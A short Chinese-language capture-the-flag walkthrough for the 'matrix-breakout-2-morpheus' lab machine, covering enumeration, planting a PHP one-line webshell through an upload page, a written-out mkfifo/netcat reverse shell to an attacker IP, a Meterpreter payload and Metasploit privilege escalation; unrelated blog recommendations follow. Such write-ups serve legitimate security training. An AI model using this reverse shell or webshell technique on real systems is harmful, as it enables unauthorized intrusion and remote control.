matrix-breakout-2-morpheus靶机通关

1.目标探测

目标开启了22、80和81端口,其中81端口需要登陆

2.目录探测

使用gobuster探测,字典很重要哈,我之前选了几个简单的,没有爆出来

发现了graffiti.php这个涂鸦界面,可以写一句话代码

写入成功后,用bp拦截,把txt文件改成php,这样就可以执行一句话木马了。

3.建立shell

采用蚁剑连接后,可以建立shell,可以看到第一个flag,但只有www-data权限

当然也可以用nc建立一个反弹shell,nc -e被禁用了,只能采取这样的方式:

复制代码
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.136.204 1234 > /tmp/f

4.建立meterpretershell

生成木马

利用第3步建立的shell上传该木马,并执行。

msf监听

5.使用提权模块

搜索local_exploit

输入meterpreter会话的session id,

发现可利用的提权漏洞,直接选用这个模块,提权

6.溯源情况

相关推荐
在角落发呆6 小时前
工具配置备份步骤:从手动备份到自动化方案
运维·windows·自动化
_upupup7 小时前
Linux的调试工具——gdb/cgdb
linux·服务器
百度一下吧7 小时前
Nginx 使用手册:从安装配置到实战部署
运维·nginx
JeJe同学7 小时前
Docker镜像导入、容器启动
linux·运维·docker
Jason_zhao_MR8 小时前
Linux与实时控制如何兼得
linux·嵌入式硬件·机器人·工业控制
回眸&啤酒鸭8 小时前
【回眸】自动化白盒测试落地实战指南
运维·自动化·log4j
闲云野鹤在人间8 小时前
MySQL|从理论、安装、备份到主从复制、MHA高可用详解
linux·运维·数据库·mysql·云计算
一个风轻云淡9 小时前
GCC 和 GDB命令简单解读
java·linux·前端
H.莓飛9 小时前
【数据结构】二叉树_OJ题
linux·开发语言·数据结构·算法
资料库0110 小时前
Linux 8个常见运维故障排查
java·linux·运维